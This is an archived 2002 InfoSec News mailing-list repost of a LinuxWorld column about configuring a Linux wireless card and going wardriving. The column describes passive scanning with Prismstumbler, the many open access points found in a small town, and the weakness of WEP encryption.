[ISN] A walk on the wireless side

From: InfoSec News (isnat_private)
Date: Wed Feb 20 2002 - 00:15:53 PST

  • Next message: InfoSec News: "[ISN] Computer Czar Issues Warning"

    http://www.linuxworld.com/site-stories/2002/0218.wardriving.html
    
    By Joe Barr
    February 19, 2002
    
    (LinuxWorld) -- The idea was innocent enough: Enable my girlfriend to
    use a laptop computer to surf wirelessly from the sofa while watching
    TV. That, however, is not quite how things worked out. As I put the
    finishing touches on this story I am:
    
    * Packing my gear.
    * Making sure my laptop is fully charged.
    * Checking to see if I have the latest versions of all the 
      prerequisite "tools."
    
    Okay. All set. Me and the laptop are wardriving again.
    
    A month or two back I wrote a column about an Austin, Texas firm named
    RockSteady. As part of the research for that story, I installed a
    "Rock Box," a dedicated firewall/network appliance. Included in it was
    a wireless NIC. All I had to do to be able to check e-mail or do
    research from the living room or the deck was to get a wireless PC
    card for my laptop. Temptation proved too great. I recently sprang for
    a D-Link DWL-650 802.11 wireless LAN card.
    
    Beginning with a fresh installation of Red Hat 7.2 on my Sony Vaio
    (PCG-XG700K), I added the latest releases of pcmcia-cs and wlan-ng to
    get the most out of my Prism2 based D-link card. Your own card might
    require different tools, depending on what chipset it uses. At the
    time, the latest releases were pcmcia-cs-3.1.31 and
    linux-wlan-ng-0.1.12. You can find them at the sites noted in
    Resources. I won't walk you through compiling and installing them, but
    I will mention that many wireless tools require you to have the kernel
    source code available for them to compile.
    
    I found myself guessing at some of the options in the
    /etc/wlan-ng.opts configuration file simply because I wasn't familiar
    with wireless terminology. Adhoc or infrastructure? Naturally, I chose
    the wrong one for the RockBox setup the first time. When I changed the
    option setting to adhoc, it worked just fine. For the benefit of any
    other late arrivals to the wireless party, I've included a brief
    primer explaining some the terms I ran across which were new to me. I
    also recommend spending some time on IRC visiting with the folks on
    the #wireless channel on openprojects.net.
    
    With a little more fiddling, I had the configuration set for adhoc
    mode and an SSID of RockNet. That's all it took. Since then, I've
    learned that an SSID of "Any" works as well. There I was, surfing from
    my armchair in the living room, feeling like this was the way Internet
    access always have been. Now, at last, if I feel like it, I can
    respond to those annoying realtime polls all the networks are doing in
    prime time TV. Susan can get on the 'net to exchange e-mail, shop, or
    visit dating sites to find a less nerdy boyfriend. Ah, the high life
    -- wireless Web surfing without leaving the flickering glow of the
    monocular monster, our TV.
    
    Trouble in paradise
    
    Alas, the wireless lifestyle is not all joy and light. Yes, wireless
    802.11 cards and access points are flying off the shelves. People want
    and find easy connectivity with 802.11-standard products. Ah, there's
    the rub, and a real dilemma it presents. Once again, we are caught
    between ease of use and security. It's almost enough to make me feel
    sympathy for Microsoft's chronic security problems, which are often
    excused as being the result of those same two choices. There are two
    major problems with wireless today. One is that all too often it is
    implemented without any kind of security at all. The other is that the
    out-of-the-box security options, if the consumer switches them on, are
    completely ineffectual.
    
    Wireless is so wide open, in fact, that it has given birth to a new
    geek Olympic sport: wardriving. Wardriving is to wireless like
    wardialing used to be to modems. The game is all about seeing how many
    potential targets you can find. Wardriving is a lot easier than
    wardialing, and a lot less intrusive. All you need to play is a
    laptop, a wireless PC card, and some software. In my case, the
    software I needed is called Prismstumbler, designed to play nicely
    with the chipset my D-Link card is based on.
    
    IANAL, (I Am Not A Lawyer) but my understanding is that wardriving is
    completely legal. (Ed. Even if he was a lawyer, the laws in your
    jurisdiction might vary.) Prismstumbler, for example, is less
    intrusive than Windows XP. According to what I've read on the 'net, a
    wireless XP box tries to associate with every wireless beacon it
    hears. Prismstumbler simply listens and tells you what it has heard.  
    It is completely passive. Unless Microsoft is operating under a
    completely separate legal system than the rest of us, scanning for
    wireless beacons can't be illegal. On second thought, perhaps I should
    come up with a different analogy.
    
    Wardriving can get sophisticated. You can connect an external antenna
    to your wireless card and put it on the roof of your car. You can
    attach a GPS device to the laptop, and an external antenna to that.  
    Then you can concentrate on driving and map the results later. I kept
    it simple, no GPS, and no antenna. Nevertheless, I still had a lot of
    fun and was surprised at how easy the game really is.
    
    My first excursion was to a small town of about 50,000 souls. I
    started up my Prismstumbler script and watched its findings appear by
    pointing my browser at http://localhost:9000. Suddenly, there it was.  
    My first "catch"! It was a used car dealership with not one, but two
    access points. Then another access point appeared, and then another. I
    drove only a couple of miles into the center of town and found more
    than a dozen. Most appeared to be unprotected. Only one was using the
    built-in encryption.
    
    The encryption used for wireless LANs, however, is useless. It has
    been cracked and the method to do so made public. One program
    (Airsnort) claims to be able to crack WEP in about a second, given the
    right number of packets to examine. The first line of defense for
    wireless -- the built-in encryption -- is just about as useful as
    ROT13.
    
    Making matters worse is the ease of installing access points. I wonder
    how many IS shops have them in place and aren't even aware of it. I
    wonder how many are in place behind conventional lines of defense.
    
    I have fun with my wardriving, and I've even alerted a few folks to
    the problems they invite with unprotected wireless. But trust me. Not
    everyone out there wardriving is satisfied at stopping with a little
    innocent fun.
    
    
    
    -
    ISN is currently hosted by Attrition.org
    
    To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
    of the mail.
    



    This archive was generated by hypermail 2b30 : Wed Feb 20 2002 - 03:34:27 PST